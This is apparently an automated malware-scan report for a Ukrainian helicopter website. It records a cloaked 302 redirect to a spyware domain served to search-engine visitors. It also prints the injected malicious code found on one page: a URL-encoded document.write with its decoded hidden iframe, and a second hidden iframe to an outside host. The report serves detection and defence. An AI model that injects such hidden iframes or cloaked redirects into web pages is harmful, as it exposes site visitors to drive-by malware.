Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://vertolet.kiev.ua/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: vertolet.kiev.ua Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 02 Mar 2015 01:49:10 GMT Location: http://www.spyware-systems.info/0/go.php?sid=2 Server: Apache/2.2.11 (Unix) PHP/5.2.3 with Suhosin-Patch Content-Length: 339 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://vertolet.kiev.ua/ | 200 OK Content-Length: 20083 Content-Type: text/html | clean |
http://tools.spylog.ru/counter_cv.js | 200 OK Content-Length: 5066 Content-Type: application/javascript | clean |
http://t.proext.com/js/to.js | 200 OK Content-Length: 1863 Content-Type: application/javascript | clean |
http://vertolet.kiev.ua/content.php?id=32 | 200 OK Content-Length: 34216 Content-Type: text/html | clean |
http://vertolet.kiev.ua/index.php | 200 OK Content-Length: 20083 Content-Type: text/html | clean |
http://vertolet.kiev.ua/content.php?id=30 | 200 OK Content-Length: 18824 Content-Type: text/html | clean |
http://vertolet.kiev.ua/news.php | 200 OK Content-Length: 18630 Content-Type: text/html | clean |
http://vertolet.kiev.ua/menu.js | 404 Not Found Content-Length: 1060 Content-Type: text/html | clean |
http://vertolet.kiev.ua/test404page.js | 404 Not Found Content-Length: 1060 Content-Type: text/html | clean |
http://vertolet.kiev.ua/encyclopedia | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 02 Mar 2015 01:49:13 GMT Location: http://vertolet.kiev.ua/encyclopedia/ Server: Apache/2.2.11 (Unix) PHP/5.2.3 with Suhosin-Patch Content-Length: 354 Content-Type: text/html; charset=iso-8859-1 | clean |
http://vertolet.kiev.ua/encyclopedia/ | 200 OK Content-Length: 18423 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%65%74%74%61%62%2E%66%72%65%65%68%6F%73%74%69%61%2E%63%6F%6D%2F%78%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%77%69%64%74%68%3D%22%35%22%20%68%65%69%67%68%74%3D%22%35%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%35%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0D%0A' ) );
Decoded script:
<iframe src="http://pettab.freehostia.com/x/out.php?s_id=1" width="5" height="5" frameborder="5" style="display:none"></iframe>
Antivirus reports:
Malicious iFrame found. size: 2x2 src: http://abbcp.cn/tds_a/go.php/go.php?id=2
This URL is marked by Google as suspicious.
<iframe frameborder = 0 height = 2 width = 2 src = "http://abbcp.cn/tds_a/go.php/go.php?id=2" />
http://vertolet.kiev.ua/encyclopedia/menu.js | 200 OK Content-Length: 1065 Content-Type: application/x-javascript | clean |
http://vertolet.kiev.ua/../index.php | 400 Bad Request Content-Length: 993 Content-Type: text/html | clean |
http://vertolet.kiev.ua/../content.php?id=32 | 400 Bad Request Content-Length: 993 Content-Type: text/html | clean |
http://vertolet.kiev.ua/../content.php?id=30 | 400 Bad Request Content-Length: 993 Content-Type: text/html | clean |
http://vertolet.kiev.ua/../order.php | 400 Bad Request Content-Length: 993 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vertolet.kiev.ua
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vertolet.kiev.ua/
Result: vertolet.kiev.ua is not infected or malware details are not published yet.